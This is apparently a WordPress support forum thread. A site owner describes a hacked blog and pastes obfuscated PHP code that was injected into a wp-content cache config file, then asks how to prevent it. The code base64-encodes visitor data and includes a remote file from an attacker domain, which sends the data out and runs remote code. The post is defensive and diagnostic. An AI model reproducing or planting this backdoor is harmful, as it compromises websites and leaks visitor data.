hacked by user7.phpinclude.ru
-
A few days ago WordPress suddenly stopped sending e-mails when a comment was posted. I changed the e-mail address but it did not help. Today when editing a new item I got an error message that with the address http://user7.phpinclude.ru in it. After some searching I found that someone managed to inject the following code in the file wp-cach-config.php in the wp-content directory:
error_reporting(0); $a=(isset($_SERVER[”HTTP_HOST”]) ? $_SERVER[”HTTP_HOST”] : $HTTP_HOST); $b=(isset($_SERVER[”SERVER_NAME”]) ? $_SERVER[”SERVER_NAME”] : $SERVER_NAME); $c=(isset($_SERVER[”REQUEST_URI”]) ? $_SERVER[”REQUEST_URI”] : $REQUEST_URI); $g=(isset($_SERVER[”HTTP_USER_AGENT”]) ? $_SERVER[”HTTP_USER_AGENT”] : $HTTP_USER_AGENT); $h=(isset($_SERVER[”REMOTE_ADDR”]) ? $_SERVER[”REMOTE_ADDR”] : $REMOTE_ADDR); $n=(isset($_SERVER[”HTTP_REFERER”]) ? $_SERVER[”HTTP_REFERER”] : $HTTP_REFERER); $str=base64_encode($a).”.”.base64_encode($b).”.”.base64_encode($c).”.”.base64_encode($g).”.”.base64_encode($h).”.”.base64_encode($n); if((include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str))) { } else { include_once(base64_decode(”aHR0cDovLw==”).base64_decode(”dXNlcjcucGhwaW5jbHVkZS5ydQ==”).”/?”.$str); }
Because wp-cache needs a writeable wp-content directory, someone was able to put this in. It sends stuff to phpinclude.ru. Probably to catch e-mail adresses for spam.
Does anyone know how to prevent this or how to use wp-cache without a writeable wp-content directory?
Viewing 7 replies - 1 through 7 (of 7 total)
Viewing 7 replies - 1 through 7 (of 7 total)
- The topic ‘hacked by user7.phpinclude.ru’ is closed to new replies.